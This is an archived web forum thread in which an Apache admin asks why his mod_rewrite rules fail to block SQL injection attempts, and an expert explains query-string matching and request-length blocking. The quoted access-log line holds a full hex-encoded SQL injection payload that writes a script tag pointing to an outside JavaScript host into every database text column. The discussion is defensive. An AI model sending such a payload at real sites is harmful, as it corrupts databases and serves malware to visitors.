homepage Welcome to WebmasterWorld Guest from 23.23.12.202
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Become a Pro Member
Home / Forums Index / Code, Content, and Presentation / Apache Web Server
Forum Library, Charter, Moderators: Ocean10000 & incrediBILL & phranque

Apache Web Server Forum

    
Mod Rewrite Rule Not Run
carfac

WebmasterWorld Senior Member 10+ Year Member



 
Msg#: 3739698 posted 3:29 pm on Sep 6, 2008 (gmt 0)

Hi Jim!

I have a mod rewrite rule in my httpd.conf I put in last night, and I checked this morning, and it is not being run. I read another post here on WebmasterWorld about sql injection scripts being run against servers- and I checked- and sure enough they were being run against me. So I figured I would do a quick rewrite to rewrite to my ban script (which I know works). I checked this morning, and the rewrite was NOT catching these. Here is a sample of one from my logs this morning:

69.248.109.#*$! - - [06/Sep/2008:03:19:33 -0600] "GET /Real/Path/On/My/Server/?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41524520405420766
1726368617228323535292C40432076617263686172283430303029204445434C41524
5205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6
E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6
C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653
D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206
F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E2
05461626C655F437572736F72204645544348204E4558542046524F4D20205461626C6
55F437572736F7220494E544F2040542C4043205748494C4528404046455443485F535
4415455533D302920424547494E20657865632827757064617465205B272B40542B275
D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207
372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F7
72E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726
520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C7363726
97074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737
273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E455
8542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4
420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626
C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 29085 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; SDR6; .NET CLR 2.0.50727)"

Here are the rewrites I put in:

RewriteRule DECLARE%20@ /banscript.cgi [PT,NC,L]
RewriteRule CHAR(4000) /banscript.cgi [PT,NC,L]
RewriteRule =CAST /banscript.cgi [PT,NC,L]

My initial feeling is that the "strange" characters ("%", "@", "(", ")" and "=") must need escaping... but I wanted them in because "declare" and "Cast" will make false positives by themselves. But it is also VERY possible I have just written bad rewrites!

So I thought I would check with the master!

Thanks!

Dave

[edited by: carfac at 3:32 pm (utc) on Sep. 6, 2008]

 

carfac

WebmasterWorld Senior Member 10+ Year Member



 
Msg#: 3739698 posted 3:31 pm on Sep 6, 2008 (gmt 0)

Oh, question two!

Is is possible to write a rewrite that will send to banscript.cgi if the request is longer than, say, 500 characters? As you can see, this is a long request- if I could ban requests greater than 500 characters, that might also work!

Dave

jdMorgan

WebmasterWorld Senior Member jdmorgan us a WebmasterWorld Top Contributor of All Time 10+ Year Member



 
Msg#: 3739698 posted 4:27 pm on Sep 6, 2008 (gmt 0)

You're trying to check the URL (using the RewriteRule), when the 'objectionable matter' is actually in the query string, and therefore not directly-visible to RewriteRule:

SQL injection blocking code example here: [webmasterworld.com...]

Request-length-based blocking:

# Block if request header is longer than 500 characters:
RewriteCond %{THE_REQUEST} ^.{255}.{245}

Note: This code snippet was taken off a live server, with the second character-count adjusted to 500 as you requested. It was evident that the maximum regex-supported character count must have been 255 per expression, which is why I had added a second expression as a work-around, to raising the total here to 500.

Like many things, I don't know why this was necessary; It could be my particular servers' regex libraries, my versions of Apache, or something else specific to my servers, or it may be true for any Apache mod_rewrite install -- I don't know; I just tweaked the code to make it work, and then moved on.

Jim

carfac

WebmasterWorld Senior Member 10+ Year Member



 
Msg#: 3739698 posted 5:00 pm on Sep 6, 2008 (gmt 0)

Jim:

You always put me in my place! :) Of course, you are correct. I SHOULD have realized that about the query string- DUH! Thanks for the help- I am sure I have this locked down now!

Dave

jdMorgan

WebmasterWorld Senior Member jdmorgan us a WebmasterWorld Top Contributor of All Time 10+ Year Member



 
Msg#: 3739698 posted 5:29 pm on Sep 6, 2008 (gmt 0)

> You always put me in my place!

That's a bit harsh! :)

Sorry, my factual tone and limited time for posting might come through that way, but it's not intentional.

Jim

carfac

WebmasterWorld Senior Member 10+ Year Member



 
Msg#: 3739698 posted 5:37 pm on Sep 6, 2008 (gmt 0)

>>> That's a bit harsh!

Sorry- not what I really intended. I meant you are the master, and I am a grasshopper!

I come here because I know you know this inside and out... and my attempts to do this are pathetic by comparison!

Sorry- I thought you would know what I meant, I worded it poorly. I kinda thought it looked weird when I wrote it- that is why I put the smilie there!

Global Options:
 top home search open messages active posts  
 

Home / Forums Index / Code, Content, and Presentation / Apache Web Server
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved